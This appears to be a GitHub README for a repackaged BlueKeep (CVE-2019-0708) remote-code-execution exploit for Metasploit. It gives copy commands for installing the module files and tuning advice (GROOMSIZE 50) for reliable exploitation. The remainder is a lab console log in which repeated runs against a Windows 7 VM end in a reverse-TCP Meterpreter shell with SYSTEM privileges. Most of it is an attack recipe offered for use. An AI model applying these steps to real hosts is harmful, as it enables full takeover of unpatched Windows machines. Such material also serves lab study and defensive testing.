bluekeep-exploit
Bluekeep(CVE 2019-0708) exploit released
https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/
How To use:
Simply make folder named rdp (for convenience) in /usr/share/metasploit-framework/modules/exploits/windows/ paste this exploit file(cve_2019_0708_bluekeep_rce.rb) in the folder(rdp) and use ur metasploit skills
Also replace the files in following folders:-
rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit/
cp ./rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb --> /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp ./cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
like: use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
and then ur general concepts of setting rhosts,lhost,payload etc
Thanks to the Genius Group of People for their wonderful work
Note:[I am not the developer of this exploit but only an ethusiast of learning exploits]
HOW TO MAKE THE EXPLOIT WORK 100% OF THE TIME:
############################
You have to set the GROOMSIZE as show below with different combinations and error Also my VMWARE(15) windows hardware was 2GB RAM and 1 Core processor
Conclusion setting GROOMSIZE to 50 worked as good as gold
############################
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 100
GROOMSIZE => 100
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Started reverse TCP handler on 192.168.43.84:4444
[*] 192.168.43.137:3389 - Detected RDP on 192.168.43.137:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.43.137:3389 - The target is vulnerable.
[*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 100MB, target address 0xfffffa801f000000, Channel count 1.
[*] 192.168.43.137:3389 - Surfing channels ...
[*] 192.168.43.137:3389 - Lobbing eggs ...
[*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 150
GROOMSIZE => 150
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Started reverse TCP handler on 192.168.43.84:4444
[*] 192.168.43.137:3389 - Detected RDP on 192.168.43.137:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.43.137:3389 - The target is vulnerable.
[*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 150MB, target address 0xfffffa8022200000, Channel count 1.
[*] 192.168.43.137:3389 - Surfing channels ...
[*] 192.168.43.137:3389 - Lobbing eggs ...
[-] 192.168.43.137:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 50
GROOMSIZE => 50
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Started reverse TCP handler on 192.168.43.84:4444
[*] 192.168.43.137:3389 - Detected RDP on 192.168.43.137:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.43.137:3389 - The target is vulnerable.
[*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa801be00000, Channel count 1.
[*] 192.168.43.137:3389 - Surfing channels ...
[*] 192.168.43.137:3389 - Lobbing eggs ...
[*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ...
[*] Sending stage (206403 bytes) to 192.168.43.137
[*] Meterpreter session 2 opened (192.168.43.84:4444 -> 192.168.43.137:51854) at 2019-09-10 22:59:44 +0530
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >